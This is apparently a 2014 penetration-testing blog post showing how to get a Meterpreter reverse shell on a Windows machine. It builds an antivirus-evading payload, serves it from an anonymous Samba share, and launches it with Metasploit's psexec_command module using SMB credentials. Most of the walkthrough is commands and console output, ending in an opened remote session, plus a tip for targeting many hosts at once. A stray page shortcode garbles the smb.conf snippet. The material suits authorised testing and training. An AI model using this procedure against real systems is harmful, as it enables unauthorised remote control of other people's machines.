Moar Shellz!

Any experienced pentester can name at least five or six different tools used to attain shell access on a remote system. I can think of eight off the top of my head:

  1. Metasploit psexec
  2. Metasploit psexec_psh
  3. Windows psexec executable
  4. Impacket psexec python script
  5. pth-winexe
  6. pth-wmis
  7. smbexec
  8. Veil-Catapult

All of these tools work and have their strengths and weaknesses. I’m going to share one more method that I recently discovered, using the Metasploit “psexec_command” module, created by Royce Davis (@r3dy__), from Accuvant LABS.

First, we need to create an AV-safe executable to deploy to our target. If you haven’t checked it out yet, Veil-Evasion is one the easiest ways to create AV-safe executables. After we have an executable, we simply create an SMB share for our targets to access.

Add this section to “/etc/samba/smb.conf”:

[fusion_builder_container hundred_percent="yes" overflow="visible"][payloads$]
   comment = Payloads
   path = /root/veil-output/compiled
   browseable = yes
   read only = yes
   guest ok = yes
   public = yes

In Kali Linux, Samba is not running by default, so we need to start it:

root@kali:~# service samba start
[ ok ] Starting Samba daemons: nmbd smbd.

Next, we startup Metasploit and open a listener:

root@kali:~# msfconsole
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.9.2-2014043001 [core:4.9 api:1.0] ]
+ -- --=[ 1355 exploits - 830 auxiliary - 237 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops      ]

msf> use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 0.0.0.0:443 
msf exploit(handler) > [*] Starting the payload handler...

Now, we setup “psexec_command” and configure the module to run the executable payload directly from our SMB share:

msf exploit(handler) > use auxiliary/admin/smb/psexec_command
msf auxiliary(psexec_command) > set COMMAND start \\192.168.81.196\payloads$\TrustedSec39.exe
COMMAND => start \192.168.81.196payloads$TrustedSec39.exe
msf auxiliary(psexec_command) > set RHOSTS 192.168.81.202
RHOSTS => 192.168.81.202
msf auxiliary(psexec_command) > set SMBPass OMGDontPwnMe!
SMBPass => OMGDontPwnMe!
msf auxiliary(psexec_command) > set SMBUser TrustedSec
SMBUser => TrustedSec

Pull the trigger and cross your fingers:

msf auxiliary(psexec_command) > exploit

[*] 192.168.81.202:445 - Executing the command...
[*] Sending stage (769536 bytes) to 192.168.81.202
[*] 192.168.81.202:445 - Getting the command output...
[*] 192.168.81.202:445 - Command finished with no output
[*] 192.168.81.202:445 - Executing cleanup...
[-] 192.168.81.202:445 - Unable to cleanup WINDOWSTempFtHThcznCVkttXJy.txt. Error: The server responded with error: STATUS_SHARING_VIOLATION (Command=6 WordCount=0)
[-] 192.168.81.202:445 - Unable to cleanup. Maybe you'll need to manually remove true, false from the target.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_command) > [*] Meterpreter session 1 opened (192.168.81.196:443 -> 192.168.81.202:14336) at 2014-05-06 09:33:39 -0400

It does leave a randomly named txt file in the “Windowstemp” directory that you need to cleanup manually, but that’s it! You can also point RHOSTS to a text file of multiple remote hosts to target.

MOAR SHELLZ!

This article was written by Larry Spohn | Senior Security Consultant @Spoonman1091.